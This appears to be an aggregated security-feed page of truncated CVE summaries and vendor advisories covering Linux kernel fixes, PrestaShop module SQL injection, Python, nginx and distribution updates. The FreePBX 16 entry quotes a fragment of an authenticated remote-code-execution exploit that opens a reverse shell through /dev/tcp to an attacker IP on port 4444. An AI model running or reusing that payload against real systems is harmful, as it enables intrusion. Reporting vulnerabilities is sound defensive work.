CVE-2024-37021 fpga: manager: add owner module and take its refcount

In the Linux kernel, the following vulnerability has been resolved: fpga: manager: add owner module and take its refcount The current implementation of the fpga manager assumes that the low-level module registers a driver for the parent device and uses its owner pointer to take the module's...

CVE-2024-37021

Technical details for CVE-2024-37021 are not publicly available in the provided connected documents. The initial description references fpga_manager owner/refcount changes in the Linux kernel, but no further technical specifics (affected products/versions/fixes) are given here. Monitor for updates.

CVE-2024-36479

Technical details about CVE-2024-36479 are not provided in the connected documents. Public information in the initial description is high level. Monitor for updates and additional details from vendor/maintainer advisories.

CVE-2024-36479 fpga: bridge: add owner module and take its refcount

In the Linux kernel, the following vulnerability has been resolved: fpga: bridge: add owner module and take its refcount The current implementation of the fpga bridge assumes that the low-level module registers a driver for the parent device and uses its owner pointer to take the module's refcoun...

CVE-2024-36682

In the module "Theme settings" pkthemesettings = 1.8.8 from Promokit.eu for PrestaShop, a guest can download all email collected while SHOP is in maintenance mode. Due to a lack of permissions control, a guest can access the txt file which collect email when maintenance is enable which can lead t...

CVE-2024-34989

In the module RSI PDF/HTML catalog evolution prestapdf = 7.0.0 from RSI for PrestaShop, a guest can perform SQL injection via PrestaPDFProductListModuleFrontController::queryDb.'...

CVE-2024-34989

In the module RSI PDF/HTML catalog evolution prestapdf = 7.0.0 from RSI for PrestaShop, a guest can perform SQL injection via PrestaPDFProductListModuleFrontController::queryDb.'...

CVE-2024-36684

In the module "Custom links" pkcustomlinks = 2.3 from Promokit.eu for PrestaShop, a guest can perform SQL injection. The script ajax.php have a sensitive SQL call that can be executed with a trivial http call and exploited to forge a SQL injection...

CVE-2021-47595

In the Linux kernel, the following vulnerability has been resolved: net/sched: schets: don't remove idle classes from the round-robin list Shuang reported that the following script: 1 tc qdisc add dev ddd0 handle 10: parent 1: ets bands 8 strict 4 priomap 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 7 2 mauseza...

CVE-2024-38588

In the Linux kernel, the following vulnerability has been resolved: ftrace: Fix possible use-after-free issue in ftracelocation KASAN reports a bug: BUG: KASAN: use-after-free in ftracelocation+0x90/0x120 Read of size 8 at addr ffff888141d40010 by task insmod/424 CPU: 8 PID: 424 Comm: insmod...

CVE-2024-38587

In the Linux kernel, the following vulnerability has been resolved: speakup: Fix sizeof vs ARRAYSIZE bug The "buf" pointer is an array of u16 values. This code should be using ARRAYSIZE which is 256 instead of sizeof which is 512, otherwise it can the still got out of bounds...

CVE-2024-4032

The “ipaddress” module contained incorrect information about whether certain IPv4 and IPv6 addresses were designated as “globally reachable” or “private”. This affected the isprivate and isglobal properties of the ipaddress.IPv4Address, ipaddress.IPv4Network, ipaddress.IPv6Address, and...

OPENSUSE-SU-2024:10177-1 perl-Module-Metadata-1.000033-1.1 on GA media

These are all security issues fixed in the perl-Module-Metadata-1.000033-1.1 package on the GA media of openSUSE Tumbleweed...

python39:3.9 and python39-devel:3.9 security update

An update is available for python-pluggy, module.python-iniconfig, module.python-psycopg2, module.python-more-itertools, module.python3x-pip, module.python3x-setuptools, python-requests, python-psutil, numpy, module.python-ply, module.python-psutil, module.python-pycparser, module.python-cffi,...

Unbreakable Enterprise kernel security update

5.15.0-207.156.6 - uek-container: Add advanced routing options Boris Ostrovsky Orabug: 36691279 - slub: use countpartialfreeapprox in slaboutofmemory Jianfeng Wang Orabug: 36655468 - slub: introduce countpartialfreeapprox Jianfeng Wang Orabug: 36655468 - Revert 'lockd: introduce safe async lock o...

kernel: wifi: iwlwifi: fix a memory corruption

A memory corruption flaw was found in the Linux kernel Intel Wireless WiFi Next Gen AGN module. This issue could allow a local user to crash the system...

[SECURITY] Fedora 40 Update: qt5-qtwayland-5.15.14-1.fc40

Qt5 - Wayland platform support and QtCompositor module...

[SECURITY] Fedora 40 Update: qt5-qtgraphicaleffects-5.15.14-1.fc40

The Qt Graphical Effects module provides a set of QML types for adding visually impressive and configurable effects to user interfaces. Effects are visual items that can be added to Qt Quick user interface as UI components...

FreePBX 16 Remote Code Execution

Exploit Title: FreePBX 16 - Remote Code Execution RCE Authenticated Exploit Author: Cold z3ro Date: 6/1/2024 Tested on: 14,15,16 Vendor: https://www.freepbx.org/ %26 /dev/tcp/'.$backconnectip.'/4444 0%261'; curlsetopt$ch, CURLOPTSSLVERIFYHOST, false; curlsetopt$ch, CURLOPTSSLVERIFYPEER, false; ec...

CVE-2024-32760

A flaw was found in the nginx HTTP/3 implementation. Undisclosed HTTP/3 encoder instructions can trigger an out-of-bounds write error, causing worker processes to crash, leading to a denial of service or other potential impacts. Mitigation Mitigation for this issue is either not available or the...